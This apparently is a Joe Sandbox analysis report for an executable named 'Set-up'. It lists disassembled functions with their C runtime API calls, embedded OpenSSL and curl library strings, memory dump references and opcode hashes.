                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
                                    • API String ID: 0-950935550
                                    • Opcode ID: 84f96b0316bfa1c00e43972e80af8c90ea7d4f1aa3caaeeb7c4871b291a9ac98
                                    • Instruction ID: cd2a7e0484573d463f8fd9fce945267e4b98c78f5450a006eb36dd06c6f38b5f
                                    • Opcode Fuzzy Hash: 84f96b0316bfa1c00e43972e80af8c90ea7d4f1aa3caaeeb7c4871b291a9ac98
                                    • Instruction Fuzzy Hash: DCB1D5B5B00A02ABEB29DB74DC49BA6F7A0BF51315F04032DE52C92281F731B564DBD6
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DDA37F
                                    Strings
                                    • QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 00DDA310
                                    • ssl/quic/quic_channel.c, xrefs: 00DDA2E3, 00DDA3BA
                                    • QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 00DDA3D5
                                    • ossl_quic_channel_raise_protocol_error_loc, xrefs: 00DDA2D9, 00DDA3B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
                                    • API String ID: 39653677-1084217658
                                    • Opcode ID: 3816d7757cece1490ee7eeac836f8d04de5861156e626e9e017656a2f854476c
                                    • Instruction ID: fe815627e1175256edc7963046b4e9547834f8a33ea12bf2b82f64375c568355
                                    • Opcode Fuzzy Hash: 3816d7757cece1490ee7eeac836f8d04de5861156e626e9e017656a2f854476c
                                    • Instruction Fuzzy Hash: BC5181F1A14345ABDF50DF69D882E9B7BE5BF88354F044929FD88E7201E631D910CBA2
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00D50E3B,?,?,00000000,?), ref: 010063E9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00D50E3B,?,?,00000000,?), ref: 010063FB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID:
                                    • API String ID: 2918714741-0
                                    • Opcode ID: de86923099d03f4715ba6b7914e2cefdd2cad2b39e6b0881e45599f5308ad7df
                                    • Instruction ID: d06519c5e72e47525901aded0413f58d89b1896f506285f7924d6704a04139a4
                                    • Opcode Fuzzy Hash: de86923099d03f4715ba6b7914e2cefdd2cad2b39e6b0881e45599f5308ad7df
                                    • Instruction Fuzzy Hash: D741C671A043119BF7069F6D9880B6F77EAAF94614F09843DE8C9C7281E776EC2487D2
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E3691C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
                                    • API String ID: 39653677-804487489
                                    • Opcode ID: 1df422a73b9deb48ec75a23c75c6706b485b3041d829bfbe6b5f5a3637632523
                                    • Instruction ID: 92820cb72935af940d52edab4acedbb9a85b011f8a860c730b1241162dc1bcdc
                                    • Opcode Fuzzy Hash: 1df422a73b9deb48ec75a23c75c6706b485b3041d829bfbe6b5f5a3637632523
                                    • Instruction Fuzzy Hash: 05312DB2A0430077F7216925AC4ABA77ADC9F94348F045438FD4C76287FA71ED54C261
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00FCABB9), ref: 00FCA34E
                                      • Part of subcall function 00E5E270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00E5E28D
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00FCABB9), ref: 00FCA446
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$_errno
                                    • String ID: .cnf$.conf$crypto/conf/conf_def.c
                                    • API String ID: 3066963124-3060939390
                                    • Opcode ID: 1e5d0506809f133e3bb5c845e1a445078e56034d8fa10fbee7e1971ef4484ac7
                                    • Instruction ID: 5f17b002cc119698fdc0fcff55f1764f03d884d74a2c1061509c726076a583e7
                                    • Opcode Fuzzy Hash: 1e5d0506809f133e3bb5c845e1a445078e56034d8fa10fbee7e1971ef4484ac7
                                    • Instruction Fuzzy Hash: 6D21F7E2E0420667DA147A31AD43F2B36CC9F6235DF080C3DFD4595292F666EE489263
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,00E5F556,00000000,FFFFFFFF,00000000,?,00000000,00E606DF,?), ref: 00E108D7
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,00DD973B), ref: 00E10977
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memsetstrcpystrlen
                                    • String ID: BUF_MEM_grow$crypto/buffer/buffer.c
                                    • API String ID: 1298912638-2735992530
                                    • Opcode ID: ac5e0d5766fd49d90b5ac8dd929e84500e0529850717ff7e6db7341fd5f4bca6
                                    • Instruction ID: 67b86eb752e5aa5effd36622fa044de8fe17891ce19d2712ac554fd75cb7f090
                                    • Opcode Fuzzy Hash: ac5e0d5766fd49d90b5ac8dd929e84500e0529850717ff7e6db7341fd5f4bca6
                                    • Instruction Fuzzy Hash: 8B314DB1A042067BE310AA209C52FABB798ABC0754F148525FC58B73C3E7B0DCD487D1
                                    APIs
                                      • Part of subcall function 01007850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,010066E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0100787B
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 010066F5
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,013228AC,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006714
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006727
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01006776
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 010067CC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno$strcmp
                                    • String ID:
                                    • API String ID: 3909137471-0
                                    • Opcode ID: 30578fac5985fbc7203ba1f04b860051f066cedf0905b6caae6cc7887362dbbd
                                    • Instruction ID: bc45d71b3d7c5bdde86d17fd9058e7b722aa630fb8f379999ae8164690965cce
                                    • Opcode Fuzzy Hash: 30578fac5985fbc7203ba1f04b860051f066cedf0905b6caae6cc7887362dbbd
                                    • Instruction Fuzzy Hash: 73319535600201DFEB129FA8DC44A5A77EABF49224F444568F9DC97392F732EE21C751
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00E62704,00000008), ref: 00E6204D
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00E62704,00000008), ref: 00E620C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcpystrlen$memcpymemset
                                    • String ID: copy_integer$crypto/params.c$general_set_int
                                    • API String ID: 2323844366-2562949257
                                    • Opcode ID: 6404e7e52bba2a3455ff196a94fb404e3d1633a75d7bc0005c86b2036687eb10
                                    • Instruction ID: 877706fbf7858a2f6274d51777df304e9bd30ad97e85057f5eaead9b8e62600d
                                    • Opcode Fuzzy Hash: 6404e7e52bba2a3455ff196a94fb404e3d1633a75d7bc0005c86b2036687eb10
                                    • Instruction Fuzzy Hash: 362160B4B8CB045BD2706628BC86F7777C8DB45348F14503DFB48B62C3E562AC45C261
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00E6299E,00000008), ref: 00E621A8
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00E6299E,00000008), ref: 00E621FE
                                      • Part of subcall function 00E640A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E640C1
                                      • Part of subcall function 00E640A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E6411E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: copy_integer$crypto/params.c$general_get_uint
                                    • API String ID: 1297977491-1187682564
                                    • Opcode ID: 68fbef201c598fbe4eb549102c36fe2f8e0f0a307e794b09413b1e48fa146262
                                    • Instruction ID: 793330a0815d636cbc7437e4662613b558cb7dd5f969a9abee0a655063db799c
                                    • Opcode Fuzzy Hash: 68fbef201c598fbe4eb549102c36fe2f8e0f0a307e794b09413b1e48fa146262
                                    • Instruction Fuzzy Hash: F52138BAB8960077E53072287C07F7F3B898BC5B58F19202DF7487A1C2F991589181A1
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,00E62BF4,00000008), ref: 00E622C1
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00E62BF4,00000008), ref: 00E62312
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: copy_integer$crypto/params.c$general_set_uint
                                    • API String ID: 1297977491-3191580373
                                    • Opcode ID: 48c901a84bcf4c33d6fa8e0142eacfade2f262cef2b1eead7f29e138540b1669
                                    • Instruction ID: de04cf15441fda5867cbdc2654947e51b32564a52d83c2f0d902c9ae46f749ba
                                    • Opcode Fuzzy Hash: 48c901a84bcf4c33d6fa8e0142eacfade2f262cef2b1eead7f29e138540b1669
                                    • Instruction Fuzzy Hash: CB219EB07C8B016BEB34A564BC45F3A37889BD0788F14302DF645BA2C3E695AC404260
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E640C1
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00E62075,?,?,?,?,?,?,00E62704,00000008), ref: 00E6411E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
